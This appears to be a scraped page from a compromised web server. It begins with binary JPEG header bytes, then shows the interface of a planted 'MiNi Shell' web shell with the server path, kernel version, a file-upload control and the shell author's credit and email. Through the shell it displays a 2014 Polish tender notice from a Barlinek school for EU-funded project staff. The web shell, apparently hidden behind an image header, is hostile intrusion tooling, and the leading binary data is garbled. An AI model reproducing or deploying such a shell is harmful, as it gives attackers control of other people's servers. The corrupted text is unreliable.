JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140228/41883-N-2014.html

<p class="kh_header"><b>Barlinek: Świadczenie usług personelu projektu  - Najlepszy w zawodzie współfinansowanego przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego. Działanie 9.2 Programu Operacyjnego Kapitał Ludzki 2007 - 2013.</b><br>
<b>Numer ogłoszenia: 41883 - 2014; data zamieszczenia: 28.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych Nr 1 im. kpt. hm. Andrzeja Romockiego "Morro" , ul. Szosowa 2, 74-320 Barlinek, woj. zachodniopomorskie, tel. 95 7461064, faks 95 7461064.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zspnr1barlinek@wp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Powiatowa Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług personelu projektu  - Najlepszy w zawodzie współfinansowanego przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego. Działanie 9.2 Programu Operacyjnego Kapitał Ludzki 2007 - 2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór i pełnienie funkcji:
- koordynatora projektu część I
- specjalista ds. obsługi finansowej projektu część II
- pracownika obsługi finansowej i administracji część III
- pracownika obsługi technicznej część IV
w zakresie działań realizowanych przez Powiat Myśliborski-Zespół Szkół Ponadgimnazjanych Nr 1 im. kpt. hm. Andrzeja Romockiego Morro w Barlinku, na rzecz projektu - Najlepszy w zawodzie współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach programu Operacyjnego Kapitał Ludzki.
Kod PVC 79421000-1 Usługi zarządzania projektem inne niż w zakresie robót budowlanych, 79211000-6 - Usługi księgowe,  79421200-3 - Usługi projektowe inne niż w zakresie budowlanym 79995100-6 - Usługi archiwizacyjne, 79996100-3 - Zarządzanie dokumentami, 79500000-9 - Dodatkowe usługi biurowe, 50000000-5 - Usługi naprawcze i konserwatorskie, 90910000-9 - Usługi sprzątania.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.12.00-3, 79.21.10.00-6, 79.99.51.00-6, 79.99.61.00-3, 79.50.00.00-9, 50.00.00.00-5, 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia zdolności do wykonania zamówienia lub dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający żąda złożenia oświadczenia o posiadaniu wymaganych uprawnień przez osoby uczestniczące w wykonywaniu zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże że posiada: 
1.	dla części I:
- Wykształcenie techniczne (wyższe magisterskie).
- Doświadczenie i wykształcenie pedagogiczne (nauczyciel dyplomowany).
- Studia podyplomowe lub kurs kwalifikacyjny z zarządzania oświatą.
- Bardzo duże doświadczenie (min. 2 letnie) w zarządzaniu (w tym zasobami ludzkimi) oraz koordynacji przygotowania i realizacji projektów współfinansowanych ze środków UE (w tym: PHARE; EFS; POKL; RPO Woj. Zachodniopomorskiego; Leonardo da Vinci i inne). W szczególności Program Operacyjny Kapitał Ludzki, Priorytet IX, Działanie 9.2 
- Umiejętność obsługi komputera (w tym MS Office, Internetu, Generatora Wniosków Aplikacyjnych i Generatora wniosków Płatniczych),
- Prawo jazdy KAT.B,
- Pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych,
- Dyspozycyjność w okresie realizacji projektu. 
- Oraz, że nie był karany za przestępstwo popełnione umyślnie lub przestępstwa skarbowe,
2.	Dla części II
- Wykształcenie wyższe ekonomiczne, 
- Duże doświadczenie w przygotowywaniu i realizacji projektów współfinansowanych ze środków UE (w tym: PHARE; POKL ; LdV). 
- Umiejętnością obsługi komputera (w tym MS Office, Internetu, Generatora Wniosków Aplikacyjnych i Generatora wniosków Płatniczych),
- Prawo jazdy KAT. B
- Pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych,
- Dyspozycyjność w okresie realizacji projektu. 
- Oraz, że nie był karany za przestępstwo popełnione umyślnie lub przestępstwa skarbowe,
3.	Dla części III
- Wykształcenie minimum średnie
- Duże doświadczenie (min. 2 letnie) w realizacji podobnych zadań (projektów współfinansowanych ze środków UE, w szczególności Program Operacyjny Kapitał Ludzki, Priorytet IX, Działanie 9.2 
- Umiejętność obsługi komputera (w tym MS Office, Internetu, Generatora Wniosków Aplikacyjnych i Generatora wniosków Płatniczych), urządzeń biurowych (w tym ksero, fax)
- Pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych,
- Dyspozycyjność w okresie realizacji projektu. 
- Oraz, że nie był karany za przestępstwo popełnione umyślnie lub przestępstwa skarbowe,
4.	Dla części IV
- Wykształcenie minimum średnie zawodowe (mechaniczne) z przygotowaniem pedagogicznym.
- Dodatkowe uprawnienia: 
a.	spawalnicze (w tym gazowe), 
b.	energetyczne do 1 kW, do prac na wysokości, 
c.	prawo jazdy kat. B,
- Umiejętność obsługi komputera (w tym MS Office, Internetu), urządzeń biurowych (w tym ksero)
- Duże doświadczenie (min. 2 letnie) w realizacji podobnych zadań (projektów współfinansowanych ze środków UE, w szczególności Program Operacyjny Kapitał Ludzki, Priorytet IX, Działanie 9.2.
- Pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych,
- Dyspozycyjność w okresie realizacji projektu. 
- Oraz, że nie był karany za przestępstwo popełnione umyślnie lub przestępstwa skarbowe,

 	Wykonawca składający ofertę zobowiązuje się w przypadku podpisania umowy, do wykonywania pracy osobiście lub skierowania do pracy osoby wskazanej w wykazie. W przypadkach losowych wykluczających zatrudnienie osoby wskazanej w wykazie, Wykonawca będzie zobowiązany do zatrudnienia osoby o tych samych kwalifikacjach zawodowych do wykonania zamówienia, a także wykonywanych przez nią czynności. Wzór wykazu załączono do SIWZ. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust.2b Prawa). Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia, nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. zmiany przepisów prawnych mających wpływ na realizację umowy, a w szczególności na jej zakres, termin, 2.zmiany przepisów prawnych podatku VAT mających wpływ na cenę umowy, 3.zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno-prawnej, przekształceniem lub połączeniem z inną firmą, 4.zmiany osób wyszczególnionych w § 4 wzoru umowy, 5.wystąpienia sytuacji niemożliwej do przewidzenia w chwili zawarcia umowy, a mającej wpływ na świadczenie usługi będącej przedmiotem umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zspnr1barlinek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych Nr 1 im. kpt. hm. Andrzeja Morro Romockiego w Barlinku. Ul. Szosowa 2, 74 - 320 Barlinek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2014 godzina 09:00, miejsce: Sekretariat Zespołu Szkół Ponadgimnazjalnych Nr 1 im. kpt. hm. Andrzeja Morro Romockiego w Barlinku. Ul. Szosowa 2, 74 - 320 Barlinek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia  i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Tytuł Projektu: Najlepszy w zawodzie. 
Numer umowy: WND-POKL.09.02.00-32-100/13.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> : Pełnienie funkcji Koordynatora Projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wykonawca zobowiązany będzie pełnić funkcję koordynatora w łącznej liczbie 777 godzin (średnio 37 godzin miesięcznie) w czasie i miejscu uzgodnionym z Zamawiającym. Informacja: -rozliczenie czasu pracy na podstawie kart czasu pracy, -czasu dojazdu do siedziby Zamawiającego oraz na inne zajęcia związane z realizacją zadania nie wlicza się do rozliczenia godzin pracy, -nie przewiduje się żadnych dodatkowych opłat za wykonanie usługi, -zgodnie z obowiązującymi Zasadami finansowania POKL, łącznie zaangażowanie w realizację zadań we wszystkich projektach NSRO nie może przekraczać 240 godzin miesięcznie. Wykonawca przed podpisaniem umowy będzie zobowiązany do złożenia stosownego oświadczenia w tym zakresie. 
Obowiązki wykonawcy:
1.	Kierowanie pracami Grupy Sterującej.
2.	Koordynacja i kierowanie realizacją projektu.
3.	Rekrutacja uczestników. 
4.	Utrzymywanie kontaktów z pracodawcami. 
5.	Nadzór nad realizacją zadań zleconych.
6.	Nadzorowanie zgodności realizowanych zadań.
7.	Przygotowywanie i wdrażanie niezbędnych zatwierdzonych zmian.
8.	Monitoring i archiwizacja dokumentacji projektowej.
9.	Nadzór nad wykorzystaniem sprzętu. 
10.	Pomiar rezultatów. 
11.	Promocja projektu, w tym dbałość o odpowiednie oznakowanie przedmiotów zakupionych w ramach projektu i dokumentów projektowych. 
12.	Sprawozdawczość merytoryczna.  
13.	Przekazywanie wiedzy na temat przestrzegania równości płci kadrze zarządzającej, szkoleniowej, Partnerowi i BO.
14.	Koordynowanie bieżących spraw związanych z realizacją projektu.
15.	Inne zadania wynikające z realizacji merytorycznej projektu.
16.	 Współpraca przy realizacji zamówień publicznych.
17.	 nadzór nad poprawnością dokumentacji projektu.
18.	Przygotowanie dokumentów oraz sporządzanie części merytorycznej wniosku o płatność i raportu końcowego.
19.	Współpraca z dyrektorem szkoły i wykonawcami usług edukacyjnych.
20.	Poddawanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu oraz sporządzanie ewentualnych uzupełnień pokontrolnych do dnia zatwierdzenia wniosku o płatność końcową projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> - Specjalisty ds. obsługi finansowej projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonawca zobowiązany będzie pełnić funkcję Specjalisty ds. obsługi finansowej projektu w łącznej liczbie 651 godzin (średnio 31 godzin miesięcznie) w czasie i miejscu uzgodnionym z Zamawiającym. Informacja: -rozliczenie czasu pracy na podstawie kart czasu pracy, -czasu dojazdu do siedziby Zamawiającego oraz na inne zajęcia związane z realizacją zadania nie wlicza się do rozliczenia godzin pracy, -nie przewiduje się żadnych dodatkowych opłat za wykonanie usługi, -zgodnie z obowiązującymi Zasadami finansowania POKL, łącznie zaangażowanie w realizację zadań we wszystkich projektach NSRO nie może przekraczać 240 godzin miesięcznie. Wykonawca przed podpisaniem umowy będzie zobowiązany do złożenia stosownego oświadczenia w tym zakresie. 
Obowiązki wykonawcy:
1.	Prowadzenie dokumentacji finansowej. 
2.	Sporządzanie wniosków o płatność i raportu końcowego. 
3.	Realizacja płatności.
4.	Nadzór finansowy.
5.	 Dokonywanie zmian w planie wydatków. 
6.	Sprawy kadrowe i zamówienia publiczne. 
7.	Inne zadania wynikające z realizacji finansowej projektu. 
8.	Sprawozdawczość finansowa.  
9.	Nadzór nad poprawnością dokumentacji finansowej projektu.
10.	Współpraca z koordynatorem, dyrektorem szkoły. 
11.	Poddawanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu oraz sporządzanie ewentualnych uzupełnień pokontrolnych do dnia zatwierdzenia wniosku o płatność końcową projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.12.00-3, 79.21.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> - Pracownik obsługi finansowej i administracji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonawca zobowiązany będzie pełnić obowiązków pracownika biurowego obsługi finansowej i administracyjnej w łącznej liczbie 420 godzin (średnio 20 godzin miesięcznie) w czasie i miejscu uzgodnionym z Zamawiającym. Informacja: -rozliczenie czasu pracy na podstawie kart czasu pracy, -czasu dojazdu do siedziby Zamawiającego oraz na inne zajęcia związane z realizacją zadania nie wlicza się do rozliczenia godzin pracy, -nie przewiduje się żadnych dodatkowych opłat za wykonanie usługi, -zgodnie z obowiązującymi Zasadami finansowania POKL, łącznie zaangażowanie w realizację zadań we wszystkich projektach NSRO nie może przekraczać 240 godzin miesięcznie. Wykonawca przed podpisaniem umowy będzie zobowiązany do złożenia stosownego oświadczenia w tym zakresie. 
Obowiązki wykonawcy:
1.	Realizacja zadań zleconych przez koordynatora projektu i specjalistę ds. obsługi finansowej
2.	Przygotowywanie i archiwizacja niezbędnej dokumentacji do realizacji projektu. 
3.	Przygotowanie dokumentów do wniosku o płatność i raportu końcowego.
4.	Przygotowywanie dokumentacji się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu oraz sporządzanie ewentualnych uzupełnień pokontrolnych do dnia zatwierdzenia wniosku o płatność końcową projektu.
5.	Prowadzenie dokumentacji PEFS.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.12.00-3, 79.99.51.00-6, 79.99.61.00-3, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pracownik obsługi technicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonawca zobowiązany będzie pełnić obowiązków pracownika biurowego obsługi finansowej i administracyjnej w łącznej liczbie 420 godzin (średnio 20 godzin miesięcznie) w czasie i miejscu uzgodnionym z Zamawiającym. Informacja: -rozliczenie czasu pracy na podstawie kart czasu pracy, -czasu dojazdu do siedziby Zamawiającego oraz na inne zajęcia związane z realizacją zadania nie wlicza się do rozliczenia godzin pracy, -nie przewiduje się żadnych dodatkowych opłat za wykonanie usługi, -zgodnie z obowiązującymi Zasadami finansowania miesięcznie. Wykonawca przed podpisaniem umowy będzie zobowiązany do złożenia stosownego oświadczenia w tym zakresie. 
Obowiązki wykonawcy:
1.	Realizacja zadań zleconych przez koordynatora projektu w zakresie obsługi technicznej.
2.	Przygotowywanie, przechowywanie i konserwacja narzędzi, maszyn i urządzeń niezbędnych do realizacji zajęć projektowych.
3.	Przygotowywanie i przechowywanie dokumentacji narzędzi, maszyn i urządzeń się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu oraz sporządzanie ewentualnych uzupełnień pokontrolnych.
4.	Utrzymywanie pomieszczeń w należytym stanie pomieszczeń i stanowisk pracy użytkowanych do realizacji zajęć projektowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 90.91.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com